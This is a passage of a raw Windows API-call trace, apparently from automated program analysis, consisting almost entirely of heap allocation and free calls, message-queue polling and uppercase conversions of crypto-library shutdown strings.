(HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0238.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0238.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0238.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0238.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0238.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0238.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0238.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0238.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0238.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0238.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0238.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0238.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0238.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0238.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0238.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0238.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0238.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0238.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0238.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0238.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0238.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0238.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0238.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0238.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0238.550] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0238.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0238.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0238.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0238.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0238.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0238.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0238.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0238.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0238.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0238.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0238.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0238.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0238.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0238.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0238.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0238.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0238.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0238.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0238.551] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0238.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0238.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0238.551] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0238.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0238.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0238.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ea8 [0238.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0238.551] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0238.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0238.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0238.551] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0238.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0238.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0238.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0238.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0238.551] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0238.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0238.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0238.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0238.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0238.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0238.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0238.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0238.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0238.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0238.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51238 [0238.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0238.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51040 [0238.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51058 [0238.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51088 [0238.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0238.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0238.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f68 [0238.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fe0 [0238.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51010 [0238.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0238.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0238.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0238.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0238.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0238.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0238.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0238.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0238.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0238.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0238.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0238.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0238.553] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0238.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0238.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0238.553] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0238.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0238.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0238.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0238.553] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0238.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0238.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0238.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0238.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0238.554] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0238.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0238.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0238.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0238.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0238.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0238.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0238.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0238.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0238.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0238.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0238.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0238.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0238.555] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0238.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0238.555] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0238.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0238.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0238.555] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0238.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0238.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0238.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0238.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0238.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0238.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0238.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0238.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0238.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0238.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0238.556] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0238.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0238.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0238.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0238.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0238.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0238.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0238.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0238.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0238.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0238.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0238.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0238.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0238.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0238.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0238.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0238.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0238.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0238.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0238.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0238.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0238.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0238.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0238.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0238.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0238.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0238.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0238.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0238.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0238.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0238.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0238.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0238.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0238.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0238.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0238.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0238.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0238.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0238.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0238.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0238.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0238.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0238.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0238.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0238.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0238.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0238.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0238.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0238.558] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0238.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0238.605] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0238.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0238.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0238.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0238.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0238.605] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0238.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0238.605] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0238.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0238.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0238.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0238.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0238.605] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0238.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0238.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0238.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0238.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0238.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0238.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0238.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0238.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0238.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0238.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0238.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0238.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d70 [0238.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cc8 [0238.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e30 [0238.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0238.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0238.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ce0 [0238.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0238.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0238.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0238.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0238.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0238.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0238.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0238.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0238.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0238.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0238.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0238.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0238.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0238.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0238.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0238.607] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0238.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 